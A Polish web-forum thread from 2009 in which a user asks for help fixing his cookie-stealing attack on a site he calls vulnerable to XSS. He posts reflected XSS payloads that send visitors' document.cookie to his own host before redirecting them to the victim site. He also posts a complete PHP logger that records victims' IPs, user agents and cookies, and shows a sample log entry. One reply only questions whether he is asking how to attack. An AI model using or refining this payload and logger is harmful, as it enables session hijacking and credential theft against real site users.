Problem z wyciagnieciem cookies

maiv0 · 29 Listopada 2009

Witam

Mam problem, chce wyciagnac cookies ze strony, jest podatna na XSS.

wpisujac w ten sposob:

search.php?type=>"><script>document.location="https://test.pl/cookie.php?cookie="</script>&keywords=Search'>https://test.pl/cookie.php?cookie="</script>&keywords=Search a MIDI&send=2

przenosi do mojej strony, ktora zapisuje do logow cookies, chcialbym jednak zeby potem przenioslo do strony glownej strony na ktorej stosuje xss, wiec proboje w ten sposob:

search.php?type=>"><script>document.location="https://test.pl/cookie.php?cookie=" + document.cookie;document.location="https://www.ofiara.com/"</script>&keywords=Search a MIDI&send=2

niestety wtedy ani nie przenosi do mojej strony ani nic sie nie dzieje, wiec jesli ktos ma jakis pomysl z gory dzieki

A teraz odnosnie mojego pliku ktory zapisuje cookies, jego kod wyglada tak:

<?php
function GetIP()

{

if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))

$ip = getenv("HTTP_CLIENT_IP");

else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))

$ip = getenv("HTTP_X_FORWARDED_FOR");

else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))

$ip = getenv("REMOTE_ADDR");

else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))

$ip = $_SERVER['REMOTE_ADDR'];

else

$ip = "unknown";

return($ip);

}

function logData()

{

$ipLog="log.txt";

$cookie = $_SERVER['QUERY_STRING'];

$register_globals = (bool) ini_get('register_gobals');

if ($register_globals) $ip = getenv('REMOTE_ADDR');

else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];

$user_agent = $_SERVER['HTTP_USER_AGENT'];

$rqst_method = $_SERVER['METHOD'];

$rem_host = $_SERVER['REMOTE_HOST'];

$referer = $_SERVER['HTTP_REFERER'];

$date=date ("l dS of F Y h:i:s A");

$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))

fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");

else

fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");

fclose($log);

}

logData();

?>

Po wejsciu na strone plik log wyglada tak:

IP: 86.142.115.27 | PORT: 59830 | HOST: | Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 | METHOD: | REF: https://strona/search.php?type=%3E%22%3E%3C...MIDI&send=2 | DATE: Sunday 29th 2009f November 2009 04:45:10 PM | COOKIE: cookie=

Jak widac cookies sie nie zapisuje ;/

Za wszelka pomoc z gory bardzo dziekuje

Pozdrawiam

Mion · 29 Listopada 2009

Czy ja dobrze rozumiem pytasz jak dokonać ataku XSS ...

Zaloguj się

Problem z wyciagnieciem cookies

Rekomendowane odpowiedzi

maiv0

Odnośnik do komentarza

Udostępnij na innych stronach

Mion

Odnośnik do komentarza

Udostępnij na innych stronach

Zarchiwizowany

Ostatnio przeglądający 0 użytkowników

Polecamy

Senuto

netBOMB.pl
dariuszjurek.pl
noclegi.biz.pl
www.zgred.pl

Współpracują z nami

SEOsklep24.pl
Zdalny Admin

Przeglądaj

Cała aktywność

Twoje kanały aktywności

Powiadomienie o plikach cookie